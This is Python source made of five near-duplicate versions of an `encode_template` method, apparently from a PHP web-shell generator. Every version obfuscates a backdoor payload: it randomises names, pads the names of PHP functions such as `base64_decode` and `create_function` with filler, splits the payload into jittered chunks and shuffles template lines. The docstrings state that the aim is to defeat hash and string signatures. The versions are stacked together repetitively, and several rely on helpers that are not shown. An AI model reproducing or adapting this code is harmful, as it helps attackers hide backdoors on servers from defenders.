def encode_template(self):
    """Render ``self.backdoor_template`` with freshly randomised names and chunking.

    Each call draws new random identifiers, passes the literal PHP function
    names and the Base64-encoded payload through ``pollute_with_static_str``,
    cuts the payload into four pieces at jittered offsets and shuffles template
    lines 1-5. Two renderings of the same payload therefore differ textually,
    so a file hash or literal-string signature taken from one sample should
    not be expected to match another. The first template line and every line
    from index 6 onward keep their position.

    Side effect: ``self.backdoor_template`` is overwritten with the shuffled
    line order, so a later call starts from the already-shuffled text.

    Returns:
        The template text with every ``%%...%%`` marker listed below replaced.
    """
    # The order of these calls is kept exactly as in the original: each helper
    # presumably draws from the shared random state (confirm against helpers).
    b64_alias = random_string()
    b64_filler, b64_mangled = pollute_with_static_str('base64_decode', frequency=0.7)

    creator_alias = random_string()
    creator_filler, creator_mangled = pollute_with_static_str(
        'create_function', frequency=0.7)

    chunk_vars = [random_string() for _ in range(4)]
    blob_filler, blob = pollute_with_static_str(base64.b64encode(self.payload))

    replace_alias = random_string()
    replace_filler, replace_mangled = pollute_with_static_str('str_replace', frequency=0.7)

    wrapper_alias = random_string()

    # Cut points sit near the quarter marks, each moved by a value from [-7, 7).
    # NOTE(review): `/` is kept as written; the results are used as slice
    # indices, which relies on integer division (Python 2 behaviour).
    total = len(blob)
    jitter = 7
    cut_a = total / 4 + randrange(-jitter, jitter)
    cut_b = total / 2 + randrange(-jitter, jitter)
    cut_c = total * 3 / 4 + randrange(-jitter, jitter)

    # Only rows 1-5 change order; row 0 and rows 6+ stay where they are.
    rows = self.backdoor_template.splitlines()
    movable = rows[1:6]
    shuffle(movable)
    reordered = [rows[0]]
    reordered.extend(movable)
    reordered.extend(rows[6:])
    self.backdoor_template = '\n'.join(reordered)

    # Applied strictly in this order, one marker at a time.
    substitutions = (
        ('%%B64_ENCODED%%', b64_mangled),
        ('%%B64_FUNC%%', b64_alias),
        ('%%CREATFUNC%%', creator_alias),
        ('%%CREATFUNC_ENCODED%%', creator_mangled),
        ('%%CREATFUNC_POLLUTION%%', creator_filler),
        ('%%REPL_ENCODED%%', replace_mangled),
        ('%%REPL_POLLUTION%%', replace_filler),
        ('%%REPL_FUNC%%', replace_alias),
        ('%%PAY_VAR1%%', chunk_vars[0]),
        ('%%PAY_VAR2%%', chunk_vars[1]),
        ('%%PAY_VAR3%%', chunk_vars[2]),
        ('%%PAY_VAR4%%', chunk_vars[3]),
        ('%%PAYLOAD_POLLUTION%%', blob_filler),
        ('%%B64_POLLUTION%%', b64_filler),
        ('%%PAYLOAD1%%', blob[:cut_a]),
        ('%%PAYLOAD2%%', blob[cut_a:cut_b]),
        ('%%PAYLOAD3%%', blob[cut_b:cut_c]),
        ('%%PAYLOAD4%%', blob[cut_c:]),
        ('%%FINALFUNC%%', wrapper_alias),
    )
    rendered = self.backdoor_template
    for marker, value in substitutions:
        rendered = rendered.replace(marker, value)
    return rendered
def encode_template(self):
    """Fill the ``%%...%%`` markers of ``self.backdoor_template`` for one rendering.

    Random identifiers, the filler returned by ``pollute_with_static_str``,
    the four payload cut points and the order of template lines 1-5 are all
    redrawn on every call, so the output text is different each time even for
    an unchanged ``self.payload``. What stays fixed is the position of the
    first template line and of every line from index 6 onward, which is the
    stable part to compare samples against.

    Side effect: the shuffled line order is written back to
    ``self.backdoor_template`` before substitution.

    Returns:
        The rendered template as a string.
    """
    # Helper calls stay in the original sequence; they presumably share one
    # random state, so reordering them would change the output (confirm).
    name_b64 = random_string()
    noise_b64, masked_b64 = pollute_with_static_str(
        'base64_decode', frequency=0.7)

    name_creator = random_string()
    noise_creator, masked_creator = pollute_with_static_str(
        'create_function', frequency=0.7)

    piece_names = [random_string() for _ in range(4)]
    noise_payload, masked_payload = pollute_with_static_str(
        base64.b64encode(self.payload))

    name_replace = random_string()
    noise_replace, masked_replace = pollute_with_static_str(
        'str_replace', frequency=0.7)

    name_final = random_string()

    # NOTE(review): the `/` results below are used as slice bounds, so this
    # relies on integer division (Python 2 behaviour); kept as written.
    size = len(masked_payload)
    spread = 7
    first_cut = size / 4 + randrange(-spread, spread)
    second_cut = size / 2 + randrange(-spread, spread)
    third_cut = size * 3 / 4 + randrange(-spread, spread)

    # Lines 1-5 are permuted; line 0 and lines 6+ are left in place.
    source_lines = self.backdoor_template.splitlines()
    permuted = source_lines[1:6]
    shuffle(permuted)
    rebuilt = [source_lines[0]]
    rebuilt += permuted
    rebuilt += source_lines[6:]
    self.backdoor_template = '\n'.join(rebuilt)

    # Marker/value pairs, replaced one after another in this exact order.
    marker_values = [
        ('%%B64_ENCODED%%', masked_b64),
        ('%%B64_FUNC%%', name_b64),
        ('%%CREATFUNC%%', name_creator),
        ('%%CREATFUNC_ENCODED%%', masked_creator),
        ('%%CREATFUNC_POLLUTION%%', noise_creator),
        ('%%REPL_ENCODED%%', masked_replace),
        ('%%REPL_POLLUTION%%', noise_replace),
        ('%%REPL_FUNC%%', name_replace),
        ('%%PAY_VAR1%%', piece_names[0]),
        ('%%PAY_VAR2%%', piece_names[1]),
        ('%%PAY_VAR3%%', piece_names[2]),
        ('%%PAY_VAR4%%', piece_names[3]),
        ('%%PAYLOAD_POLLUTION%%', noise_payload),
        ('%%B64_POLLUTION%%', noise_b64),
        ('%%PAYLOAD1%%', masked_payload[:first_cut]),
        ('%%PAYLOAD2%%', masked_payload[first_cut:second_cut]),
        ('%%PAYLOAD3%%', masked_payload[second_cut:third_cut]),
        ('%%PAYLOAD4%%', masked_payload[third_cut:]),
        ('%%FINALFUNC%%', name_final),
    ]
    output = self.backdoor_template
    for marker, value in marker_values:
        output = output.replace(marker, value)
    return output
def encode_template(self):
    """Render ``self.backdoor_template`` through ``BdTemplate.substitute``.

    Every call draws new random names via ``randstr``, passes the literal PHP
    function names and the Base64-encoded payload through
    ``pollute_with_static_str``, picks three jittered cut points to split the
    payload into four pieces, and shuffles template lines 1-5. Output text
    therefore varies between calls for the same ``self.payload``; only the
    position of the first line and of lines from index 6 onward is constant.

    Side effect: ``self.backdoor_template`` is replaced by its shuffled form.

    Returns:
        Whatever ``BdTemplate(...).substitute(...)`` returns for the fields
        below (presumably the rendered string; ``BdTemplate`` is not shown).
    """
    # Call order is preserved from the original because the helpers presumably
    # consume a shared random state (confirm against their definitions).
    b64_alias = randstr()
    b64_filler, b64_mangled = pollute_with_static_str('base64_decode', frequency=0.7)

    creator_alias = randstr()
    creator_filler, creator_mangled = pollute_with_static_str(
        'create_function', frequency=0.7)

    chunk_vars = [randstr() for _ in range(4)]
    blob_filler, blob = pollute_with_static_str(base64.b64encode(self.payload))

    replace_alias = randstr()
    replace_filler, replace_mangled = pollute_with_static_str('str_replace', frequency=0.7)

    wrapper_alias = randstr()

    # NOTE(review): `/` is kept as written; its results are slice indices, so
    # this relies on integer division (Python 2 behaviour).
    total = len(blob)
    jitter = 7
    cut_a = total / 4 + randrange(-jitter, jitter)
    cut_b = total / 2 + randrange(-jitter, jitter)
    cut_c = total * 3 / 4 + randrange(-jitter, jitter)

    # Rows 1-5 are permuted; row 0 and rows 6+ keep their place.
    rows = self.backdoor_template.splitlines()
    movable = rows[1:6]
    shuffle(movable)
    reordered = [rows[0]]
    reordered.extend(movable)
    reordered.extend(rows[6:])
    self.backdoor_template = '\n'.join(reordered)

    renderer = BdTemplate(self.backdoor_template)
    fields = {
        'B64_FUNC': b64_alias,
        'B64_ENC': b64_mangled,
        'B64_POLL': b64_filler,
        'CREAT_FUNC': creator_alias,
        'CREAT_ENC': creator_mangled,
        'CREAT_POLL': creator_filler,
        'REPL_FUNC': replace_alias,
        'REPL_ENC': replace_mangled,
        'REPL_POLL': replace_filler,
        'PAY_VAR1': chunk_vars[0],
        'PAY_VAR2': chunk_vars[1],
        'PAY_VAR3': chunk_vars[2],
        'PAY_VAR4': chunk_vars[3],
        'PAY_POLL': blob_filler,
        'PAY1': blob[:cut_a],
        'PAY2': blob[cut_a:cut_b],
        'PAY3': blob[cut_b:cut_c],
        'PAY4': blob[cut_c:],
        'FINAL_FUNC': wrapper_alias,
    }
    return renderer.substitute(**fields)
def encode_template(self):
    """Produce one rendering of ``self.backdoor_template`` via ``BdTemplate``.

    Identifier names (``randstr``), the filler and mangled strings returned
    by ``pollute_with_static_str``, the three payload cut points and the
    order of template lines 1-5 are regenerated on each call. Renderings of
    the same ``self.payload`` consequently differ from one another; the first
    template line and all lines from index 6 onward stay in position.

    Side effect: the shuffled template is stored back on
    ``self.backdoor_template``.

    Returns:
        The result of ``BdTemplate(...).substitute(...)`` (presumably the
        rendered string; ``BdTemplate`` is defined outside this block).
    """
    # Keep the helper calls in this sequence: they presumably draw from one
    # shared random state, so the order is part of the behaviour (confirm).
    name_b64 = randstr()
    noise_b64, masked_b64 = pollute_with_static_str("base64_decode", frequency=0.7)

    name_creator = randstr()
    noise_creator, masked_creator = pollute_with_static_str("create_function", frequency=0.7)

    piece_names = [randstr() for _ in range(4)]
    noise_payload, masked_payload = pollute_with_static_str(base64.b64encode(self.payload))

    name_replace = randstr()
    noise_replace, masked_replace = pollute_with_static_str("str_replace", frequency=0.7)

    name_final = randstr()

    # NOTE(review): the `/` results are used as slice bounds, which relies on
    # integer division (Python 2 behaviour); left unchanged here.
    size = len(masked_payload)
    spread = 7
    first_cut = size / 4 + randrange(-spread, spread)
    second_cut = size / 2 + randrange(-spread, spread)
    third_cut = size * 3 / 4 + randrange(-spread, spread)

    # Lines 1-5 are permuted; line 0 and lines 6+ are untouched.
    source_lines = self.backdoor_template.splitlines()
    permuted = source_lines[1:6]
    shuffle(permuted)
    rebuilt = [source_lines[0]]
    rebuilt += permuted
    rebuilt += source_lines[6:]
    self.backdoor_template = "\n".join(rebuilt)

    renderer = BdTemplate(self.backdoor_template)
    values = dict(
        B64_FUNC=name_b64,
        B64_ENC=masked_b64,
        B64_POLL=noise_b64,
        CREAT_FUNC=name_creator,
        CREAT_ENC=masked_creator,
        CREAT_POLL=noise_creator,
        REPL_FUNC=name_replace,
        REPL_ENC=masked_replace,
        REPL_POLL=noise_replace,
        PAY_VAR1=piece_names[0],
        PAY_VAR2=piece_names[1],
        PAY_VAR3=piece_names[2],
        PAY_VAR4=piece_names[3],
        PAY_POLL=noise_payload,
        PAY1=masked_payload[:first_cut],
        PAY2=masked_payload[first_cut:second_cut],
        PAY3=masked_payload[second_cut:third_cut],
        PAY4=masked_payload[third_cut:],
        FINAL_FUNC=name_final,
    )
    return renderer.substitute(**values)
def encode_template(self):
    """Render ``self.backdoor_template`` using a single payload variable name.

    Only ``'base64_decode'`` and the Base64-encoded payload go through
    ``pollute_with_static_str`` in this variant. The payload is split into
    four pieces at jittered offsets, and every template line except the first
    and the last three is shuffled. Names, filler, cut points and line order
    are redrawn per call, so renderings of the same payload differ textually;
    the first line and the final three lines keep their position.

    Side effect: ``self.backdoor_template`` is overwritten with the shuffled
    line order.

    Returns:
        The template text with each ``%%...%%`` marker below replaced.
    """
    # Call order preserved: the helpers presumably share one random state
    # (confirm against their definitions).
    b64_alias = random_string()
    b64_filler, b64_mangled = pollute_with_static_str('base64_decode', frequency=0.7)

    chunk_var = random_string()
    blob_filler, blob = pollute_with_static_str(base64.b64encode(self.payload))

    replace_alias = random_string()

    # NOTE(review): `/` is kept as written; the results are slice indices, so
    # this relies on integer division (Python 2 behaviour).
    total = len(blob)
    jitter = 7
    cut_a = total / 4 + randrange(-jitter, jitter)
    cut_b = total / 2 + randrange(-jitter, jitter)
    cut_c = total * 3 / 4 + randrange(-jitter, jitter)

    # Everything between the first row and the last three rows is permuted.
    rows = self.backdoor_template.splitlines()
    movable = rows[1:-3]
    shuffle(movable)
    reordered = [rows[0]]
    reordered.extend(movable)
    reordered.extend(rows[-3:])
    self.backdoor_template = '\n'.join(reordered)

    # Replaced one marker at a time, in this order.
    substitutions = (
        ('%%B64_ENCODED%%', b64_mangled),
        ('%%B64_FUNC%%', b64_alias),
        ('%%PAY_VAR%%', chunk_var),
        ('%%PAYLOAD_POLLUTION%%', blob_filler),
        ('%%B64_POLLUTION%%', b64_filler),
        ('%%PAYLOAD1%%', blob[:cut_a]),
        ('%%PAYLOAD2%%', blob[cut_a:cut_b]),
        ('%%PAYLOAD3%%', blob[cut_b:cut_c]),
        ('%%PAYLOAD4%%', blob[cut_c:]),
        ('%%REPL_FUNC%%', replace_alias),
    )
    rendered = self.backdoor_template
    for marker, value in substitutions:
        rendered = rendered.replace(marker, value)
    return rendered